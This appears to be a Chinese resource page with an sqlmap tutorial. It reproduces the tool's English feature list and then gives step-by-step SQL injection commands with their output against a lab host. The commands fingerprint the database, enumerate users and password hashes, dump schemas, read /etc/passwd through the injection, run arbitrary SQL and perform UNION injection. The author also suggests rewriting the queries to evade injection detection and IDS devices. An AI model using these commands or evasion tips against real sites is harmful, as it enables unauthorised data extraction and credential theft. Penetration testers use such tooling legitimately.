-
(仅限了解sqlmap的人阅读)
资源介绍
Here is a list of major features implemented in sqlmap:
* Full support for MySQL, Oracle, PostgreSQL and Microsoft SQL
Server database management system back-end. Besides these four DBMS,
sqlmap can also identify Microsoft Access, DB2, Informix and Sybase;
* Extensive database management system back-end fingerprint based
upon:
o Inband DBMS error messages
o DBMS banner parsing
o DBMS functions output comparison
o DBMS specific features such as MySQL comment injection
o Passive SQL injection fuzzing
* It fully supports two SQL injection techniques:
o Blind SQL injection, also known as Inference SQL injection
o Inband SQL injection, also known as UNION query SQL
injection
and it partially supports error based SQL injection as one of
the vectors for database management system fingerprint;
* It automatically tests all provided GET, POST, Cookie and User-
Agent parameters to find dynamic ones. On these it automatically tests
and detects the ones affected by SQL injection. Moreover each dynamic
parameter is tested for numeric, single quoted string, double quoted
string and all of these three type with one and two brackets to find
which is the valid syntax to perform further injections with;
* It is possible to provide the name of the only parameter(s) that
you want to perform tests and use for injection on, being them GET,
POST, Cookie parameters;
* SQL injection testing and detection does not depend upon the web
application database management system back-end. SQL injection
exploiting and query syntax obviously depend upon the web application
database management system back-end;
* It recognizes valid queries by false ones based upon HTML output
page hashes comparison by default, but it is also possible to choose
to perform such test based upon string matching;
* HTTP requests can be performed in both HTTP method GET and POST
(default: GET);
* It is possible to perform HTTP requests using a HTTP User-Agent
header string randomly selected from a text file;
* It is possible to provide a HTTP Cookie header string, useful
when the web application requires authentication based upon cookies
and you have such data;
* It is possible to provide an anonymous HTTP proxy address and
port to pass by the HTTP requests to the target URL;
* It is possible to provide the remote DBMS back-end if you
already know it making sqlmap save some time to fingerprint it;
* It supports various command line options to get database
management system banner, current DBMS user, current DBMS database,
enumerate users, users password hashes, databases, tables, columns,
dump tables entries, dump the entire DBMS, retrieve an arbitrary file
content (if the remote DBMS is MySQL) and provide your own SQL SELECT
statement to be evaluated;
* It is possible to make sqlmap automatically detect if the
affected parameter is also affected by an UNION query SQL injection
and, in such case, to use it to exploit the vulnerability;
* It is possible to exclude system databases when enumerating
tables, useful when dumping the entire DBMS databases tables entries
and you want to skip the default DBMS data;
* It is possible to view the Estimated time of arrival for each
query output, updated in real time while performing the SQL injection
attack;
* Support to increase the verbosity level of output messages;
* It is possible to save queries performed and their retrieved
value in real time on an output text file and continue the injection
resuming from such file in a second time;
* PHP setting magic_quotes_gpc bypass by encoding every query
string, between single quotes, with CHAR (or similar) DBMS specific
function.
昨天晚上实在忍不住,还是看了一些,然后测试了一下。里面的sql语句太过于简单,不过你可以定制。修改为更富在的语句。以绕过注入检测和其他IDS设
备。
稍晚一下,我编译一个dos版本的给你们。
1、首先安装python2.5。
2、然后进入sqlmap的目录,执行sqlmap
详细用法
1、sqlmap -u 注入点
2、sqlmap -g "关键词“ //这是通过google搜索注入,现在还不可以,不知道是什么原因,可以直接修改为百度
3、
python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" -v 1
[hh:mm:25] [INFO] testing if the url is stable, wait a few seconds
[hh:mm:26] [INFO] url is stable
[hh:mm:26] [INFO] testing if GET parameter 'id' is dynamic
[hh:mm:26] [INFO] confirming that GET parameter 'id' is dynamic
[hh:mm:26] [INFO] GET parameter 'id' is dynamic
[hh:mm:26] [INFO] testing sql injection on GET parameter 'id'
[hh:mm:26] [INFO] testing numeric/unescaped injection on GET parameter
'id'
[hh:mm:26] [INFO] confirming numeric/unescaped injection on GET
parameter 'id'
[hh:mm:26] [INFO] GET parameter 'id' is numeric/unescaped injectable
[hh:mm:26] [INFO] testing MySQL
[hh:mm:26] [INFO] query: CONCAT('5', '5')
[hh:mm:26] [INFO] retrieved: 55
[hh:mm:26] [INFO] performed 20 queries in 0 seconds
[hh:mm:26] [INFO] confirming MySQL
[hh:mm:26] [INFO] query: LENGTH('5')
[hh:mm:26] [INFO] retrieved: 1
[hh:mm:26] [INFO] performed 13 queries in 0 seconds
[hh:mm:26] [INFO] query: SELECT 5 FROM information_schema.TABLES LIMIT
0, 1
[hh:mm:26] [INFO] retrieved: 5
[hh:mm:26] [INFO] performed 13 queries in 0 seconds
remote DBMS: MySQL >= 5.0.0
4、指定参数注入
python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" -v 1
-p "id"
[hh:mm:17] [INFO] testing if the url is stable, wait a few seconds
[hh:mm:18] [INFO] url is stable
[hh:mm:18] [INFO] testing sql injection on parameter 'id'
[hh:mm:18] [INFO] testing numeric/unescaped injection on parameter
'id'
[hh:mm:18] [INFO] confirming numeric/unescaped injection on
parameter 'id'
[hh:mm:18] [INFO] parameter 'id' is numeric/unescaped injectable
[...]
Or if you want to provide more than one parameter, for instance:
$ python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" -v
1 -p "cat,id"
5、指定方法和post的数据
python sqlmap.py -u "http://192.168.1.47/page.php" --method "POST" --
data "id=1&cat=2"
6、指定cookie,可以注入一些需要登录的地址
python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" --cookie
"COOKIE_VALUE"
7、通过代理注入
python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" --proxy
"http://127.0.0.1:8118"
8、指定关键词,也可以不指定。程序会根据返回结果的hash自动判断
python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" --string
"STRING_ON_TRUE_PAGE"
9、指定数据,这样就不用猜测其他的数据库里。可以提高效率。
--remote-dbms
10、指纹判别数据库类型
python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" -v 1 -f
11、获取banner信息
python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" -b
banner: '5.0.38-Ubuntu_0ubuntu1.1-log'
12、获取当前数据库,当前用户,所有用户,密码,所有可用数据库。
python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" --
current-db
current database: 'testdb'
python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" --users
database management system users [5]:
[*] 'debian-sys-maint'@'localhost'
[*] 'root'@'127.0.0.1'
[*] 'root'@'leboyer'
[*] 'root'@'localhost'
[*] 'testuser'@'localhost'
python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" --
passwords
database management system users password hashes:
[*] debian-sys-maint [1]:
password hash: *XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
[*] root [1]:
password hash: *YYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYY
[*] testuser [1]:
password hash: *ZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZ
python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" --dbs
available databases [3]:
[*] information_schema
[*] mysql
[*] testdb
python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" --tables
-D "information_schema"
Database: information_schema
[16 tables]
+---------------------------------------+
| CHARACTER_SETS |
| COLLATION_CHARACTER_SET_APPLICABILITY |
| COLLATIONS |
| COLUMN_PRIVILEGES |
| COLUMNS |
| KEY_COLUMN_USAGE |
| ROUTINES |
| SCHEMA_PRIVILEGES |
| SCHEMATA |
| STATISTICS |
| TABLE_CONSTRAINTS |
| TABLE_PRIVILEGES |
| TABLES |
| TRIGGERS |
| USER_PRIVILEGES |
| VIEWS |
+---------------------------------------+
python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" --
columns -T "user" -D "mysql"
Database: mysql
Table: user
[37 columns]
+-----------------------+------+
| Column | Type |
+-----------------------+------+
| Alter_priv | enum |
| Alter_routine_priv | enum |
| Create_priv | enum |
| Create_routine_priv | enum |
| Create_tmp_table_priv | enum |
| Create_user_priv | enum |
| Create_view_priv | enum |
| Delete_priv | enum |
| Drop_priv | enum |
| Execute_priv | enum |
| File_priv | enum |
| Grant_priv | enum |
| Host | char |
| Index_priv | enum |
| Insert_priv | enum |
| Lock_tables_priv | enum |
| max_connections | int |
| max_questions | int |
| max_updates | int |
| max_user_connections | int |
| Password | char |
| Process_priv | enum |
| References_priv | enum |
| Reload_priv | enum |
| Repl_client_priv | enum |
| Repl_slave_priv | enum |
| Select_priv | enum |
| Show_db_priv | enum |
| Show_view_priv | enum |
| Shutdown_priv | enum |
| ssl_cipher | blob |
| ssl_type | enum |
| Super_priv | enum |
| Update_priv | enum |
| User | char |
| x509_issuer | blob |
| x509_subject | blob |
+-----------------------+------+
13、显示指定的文件内容,一般用于php
python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" --file /
etc/passwd
/etc/passwd:
---
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/false
backup:x:34:34:backup:/var/backups:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
mysql:x:104:105:MySQL Server,,,:/var/lib/mysql:/bin/false
postgres:x:105:107:PostgreSQL administrator,,,:/var/lib/postgresql:/
bin/bash
inquis:x:1000:100:Bernardo Damele,,,:/home/inquis:/bin/bash
---
14、执行你自己的sql语句。
python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" -v 1 -e
"SELECT password FROM mysql.user WHERE user = 'root' LIMIT 0, 1"
[hh:mm:18] [INFO] fetching expression output: 'SELECT password FROM
mysql.user WHERE user = 'root' LIMIT 0, 1'
[hh:mm:18] [INFO] query: SELECT password FROM mysql.user WHERE user =
'root' LIMIT 0, 1
[hh:mm:18] [INFO] retrieved: YYYYYYYYYYYYYYYY
[hh:mm:19] [INFO] performed 118 queries in 0 seconds
SELECT password FROM mysql.user WHERE user = 'root' LIMIT 0, 1:
'YYYYYYYYYYYYYYYY'
15、union注入
python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" --union-
check
valid union: 'http://192.168.1.47/page.php?id=1 UNION ALL SELECT
NULL, NULL, NULL--&cat=2'
python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" -v 1 --
union-use --banner
[...]
[hh:mm:24] [INFO] testing inband sql injection on parameter 'id'
[hh:mm:24] [INFO] the target url could be affected by an inband sql
injection vulnerability
[hh:mm:24] [INFO] confirming inband sql injection on parameter 'id'
[...]
[hh:mm:24] [INFO] fetching banner
[hh:mm:24] [INFO] request: http://192.168.1.47/page.php?id=1 UNION ALL
SELECT CONCAT(CHAR(95,95,83,84,65,82,84,95,95), VERSION(),
CHAR(95,95,83,84,79,80,95,95)), NULL, NULL--&cat=2
[hh:mm:24] [INFO] performed 1 queries in 0 seconds
banner: '5.0.38-Ubuntu_0ubuntu1.1-log'
16、保存注入过程到一个文件,还可以从文件恢复出注入过程,很方便,一大特色。你可以在注入的时候中断,有时间再继续。
python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" -v 1 -b -
o "sqlmap.log"
[...]
[hh:mm:09] [INFO] fetching banner
[hh:mm:09] [INFO] query: VERSION()
[hh:mm:09] [INFO] retrieved: 5.0.30-Debian_3-log
[hh:mm:11] [INFO] performed 139 queries in 1 seconds
banner: '5.0.38-Ubuntu_0ubuntu1.1-log'
python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" -v 1 --
banner -o "sqlmap.log" --resume
[...]
[hh:mm:13] [INFO] fetching banner
[hh:mm:13] [INFO] query: VERSION()
[hh:mm:13] [INFO] retrieved the length of query: 26
[hh:mm:13] [INFO] resumed from file 'sqlmap.log': 5.0.45-Deb
[hh:mm:13] [INFO] retrieved: ian_1ubuntu3-log
banner:
- 上一篇: sqlmap注入工具
- 下一篇: sqlmap工具